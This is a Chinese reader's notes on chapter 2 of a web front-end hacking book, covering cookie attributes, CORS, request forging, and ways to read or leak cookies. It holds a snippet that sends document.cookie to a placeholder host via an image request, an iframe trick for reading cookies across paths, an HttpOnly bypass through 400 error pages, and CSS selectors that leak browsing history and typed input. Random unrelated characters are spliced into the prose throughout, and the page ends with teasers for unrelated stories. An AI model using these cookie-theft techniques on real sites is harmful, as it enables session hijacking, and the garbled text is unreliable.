《Web前端黑客技術(shù)解密》讀書筆記(第二章)

本文地址:http://www.reibang.com/p/16500959dec0

第二章

HTTP

Set-Cookie: 每個 Set-Cookie設(shè)置一個Cookie,如下示例:

Set-Cookie: PTOKEN=; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com; httpOnly; Secure;

Set-Cookie: USERIDPT=C93984899D983; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com;
  • expires:過期時間,如果是過去時間箱舞,表明這個Cookie要被刪掉
  • path:相對路徑,只有這個路徑下的資源可以訪問這個Cookie
  • domain: 域名掏导,有權(quán)限設(shè)置為更高一級的域名
  • HttpOnly:標志(默認無,若有表明Cookie存在于HTTP層面羽峰,不能被客戶端腳本讀到)
  • Secure: 標志(默認無趟咆,若有表明Cookie僅通過HTTPS協(xié)議傳輸)

iframe:不同域時,子頁面可以修改父頁面location.href梅屉,但是不能讀戎瞪础;

跨轉(zhuǎn)請求(CORS)

通過給目標域添加 Access-Control-Allow-Origin

如果不設(shè)置Access-Control-Allow-Origin:http://www.foo.com坯汤,數(shù)據(jù)依然可以被偷到虐唠。雖然瀏覽器會報錯,但目標域依然可以接受到

默認情況下惰聂,這樣的跨域無法帶上目標域的會話疆偿,前端需要設(shè)置 XHR 的 withCredentialstrue妈橄,同時目標域必須設(shè)置如下:

<?php
header('Access-Control-Allow-Origin: http://www.foo.com');
header('Access-Control-Allow-Credentials: true'); // 允許跨域證書發(fā)送
// ...
?>

模擬用戶發(fā)瀏覽器請求

第一種 通過js動態(tài)創(chuàng)建iframe/frame/script/link/img等標簽,然后將他們的src或href屬性指向目標地址

var cookie = escape(document.cookie);
new Image().src = 'http://localhost/?'+cookie;
// 或(會跳頁面)
location.href='http://localhost/?'+cookie;

第二種 通過創(chuàng)建XHR發(fā)送同步或異步請求

默認POST提交的 Content-Typeapplication/x-www-urlencoded翁脆,還有一種常見的 multipart/form-data ,一般有文件上傳時用這種

第三種 通過原生form表單鼻种,常用于 CSRF 攻擊

通過創(chuàng)建 form反番、input等標簽,然后設(shè)置form的 form.action="http://localhost/..."叉钥,調(diào)用 form.submit() 提交表單

Cookie

  1. 子域Cookie機制
  • 不指定domain時罢缸,默認為當前域
// 當前域為foo.test.com 時候,domain為foo.test.com
document.cookie='test=1;'
  • 可以設(shè)置上級根域投队,向下不行枫疆,好處是不同子域可以共享 Cookie,但也會造成攻擊

如當前域名為 foo.test.com

// 可行
document.cookie='test=1;domain=test.com;'

//不可行
document.cookie='test=1;domain=bar.foo.test.com;'
  1. 路徑Cookie機制
  • 設(shè)置Cookie如果不指定path的值敷鸦,默認為當前頁面的路徑

如:a.foo.com/admin/index.php 頁面下設(shè)置Cookie息楔,path的值為 /admin/

  • 不同路徑下Cookie不能互相讀取,可以借助iframe的DOM操作即可
var src = '....';
var iframe = document.createElement('iframe');
iframe.src = src;
iframe.onload = function(){
    var doc = iframe.contentDocument || iframe.contentWindow.document;
    console.log(doc.cookie);
}
  1. HttpOnly Cookie機制
  • 添加HttpOnly標志后扒披,僅在 HTTP層面?zhèn)鬏斨狄溃琂S獲取不到

以PHP為例

<?php
// 設(shè)置普通Cookie
setcookie('test', 1, time() + 3600, "", "", 0);

// 第七個參數(shù)是HttpOnly標志,1為開啟碟案,0為關(guān)閉
setcookie('test', 1, time() + 3600, "", "", 0, 1);
?>
  • 服務(wù)端報錯時可能會拋出相關(guān)Cookie信息愿险,尤其是400錯誤

所以模擬一個400請求,通過解析響應(yīng)就可以得到 HttpOnly 的Cookie

  1. Secure Cookie機制
  • Cookie只能在 HTTPS層面?zhèn)鬏?/li>
  • js可以讀取 Secure Cookie 价说,當然就可以篡改
// path與domain必須一致辆亏,否則為不同Cookie
document.cookie = 'test=1;path=/;secure;';
  1. 本地Cookie與內(nèi)存Cookie
  • expires 緊密相關(guān),沒設(shè)置過期時間為內(nèi)存Cookie鳖目,瀏覽器關(guān)閉就消失扮叨;設(shè)置了為本地Cookie,為以文本形式保存在本地领迈,到期后自動消失

  • 可以修改內(nèi)存Cookie為本地Cookie甫匹,安全的核心在于服務(wù)端校驗,合法性惦费、唯一性兵迅、是否被篡改等

  1. Cookie的P3P性質(zhì)

P3P(Platform for Privacy Preferences Project)為HTTP響應(yīng)頭的一個字段,為W3C公布的一項隱私保護推薦標準薪贫,用于標示是否允許目標網(wǎng)站的Cookie被另一個域通過加載目標網(wǎng)站而設(shè)置或發(fā)送恍箭,僅IE執(zhí)行了該策略(具體參考書本 P41)

幾種存儲方式比較

  • Cookie

一般50個,最新chrome可以存170個瞧省,每個最大4K扯夭。超過會被刪除一些鳍贾。刪除方式是設(shè)置過期時間即可。無法跨瀏覽器

  • userDate

IE中持久存儲交洗,最大64K左右

  • localStorage\sessionStorage

區(qū)別是localStorage一直生效骑科,sessionStorage在關(guān)閉瀏覽器時會刪除,用法兩種一樣

  • FlashCookie

跨瀏覽器通用解決方案构拳,默認存儲大小為100K

函數(shù)劫持

js劫持只需重寫這個函數(shù)即可

CSS偽裝

通過設(shè)置偽類可以出發(fā)請求

// 可以知道瀏覽器是否訪問過 http://google.com
a:visited{
    background:url(http://google.com)
}

// 用戶在input表單中輸入a開頭就會發(fā)送一個請求
input[value^='a']{
    background:url(http://google.com);
}

// 鼠標選擇就會發(fā)送請求
#select::selection{
    background:url(http://google.com)
}

// ...

附原書購買地址: http://item.jd.com/11181832.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末咆爽,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子置森,更是在濱河造成了極大的恐慌斗埂,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,386評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件凫海,死亡現(xiàn)場離奇詭異呛凶,居然都是意外死亡,警方通過查閱死者的電腦和手機行贪,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,142評論 3 394
  • 文/潘曉璐 我一進店門漾稀,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人建瘫,你說我怎么就攤上這事县好。” “怎么了暖混?”我有些...
    開封第一講書人閱讀 164,704評論 0 353
  • 文/不壞的土叔 我叫張陵缕贡,是天一觀的道長。 經(jīng)常有香客問我拣播,道長晾咪,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,702評論 1 294
  • 正文 為了忘掉前任贮配,我火速辦了婚禮谍倦,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘泪勒。我一直安慰自己昼蛀,他們只是感情好,可當我...
    茶點故事閱讀 67,716評論 6 392
  • 文/花漫 我一把揭開白布圆存。 她就那樣靜靜地躺著叼旋,像睡著了一般。 火紅的嫁衣襯著肌膚如雪沦辙。 梳的紋絲不亂的頭發(fā)上夫植,一...
    開封第一講書人閱讀 51,573評論 1 305
  • 那天,我揣著相機與錄音油讯,去河邊找鬼详民。 笑死延欠,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的沈跨。 我是一名探鬼主播由捎,決...
    沈念sama閱讀 40,314評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼饿凛!你這毒婦竟也來了狞玛?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,230評論 0 276
  • 序言:老撾萬榮一對情侶失蹤笤喳,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后碌宴,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體杀狡,經(jīng)...
    沈念sama閱讀 45,680評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,873評論 3 336
  • 正文 我和宋清朗相戀三年贰镣,在試婚紗的時候發(fā)現(xiàn)自己被綠了呜象。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,991評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡碑隆,死狀恐怖恭陡,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情上煤,我是刑警寧澤休玩,帶...
    沈念sama閱讀 35,706評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站劫狠,受9級特大地震影響拴疤,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜独泞,卻給世界環(huán)境...
    茶點故事閱讀 41,329評論 3 330
  • 文/蒙蒙 一呐矾、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧懦砂,春花似錦蜒犯、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,910評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至羽资,卻和暖如春毫炉,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背削罩。 一陣腳步聲響...
    開封第一講書人閱讀 33,038評論 1 270
  • 我被黑心中介騙來泰國打工瞄勾, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留费奸,地道東北人。 一個月前我還...
    沈念sama閱讀 48,158評論 3 370
  • 正文 我出身青樓进陡,卻偏偏與公主長得像愿阐,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子趾疚,可洞房花燭夜當晚...
    茶點故事閱讀 44,941評論 2 355

推薦閱讀更多精彩內(nèi)容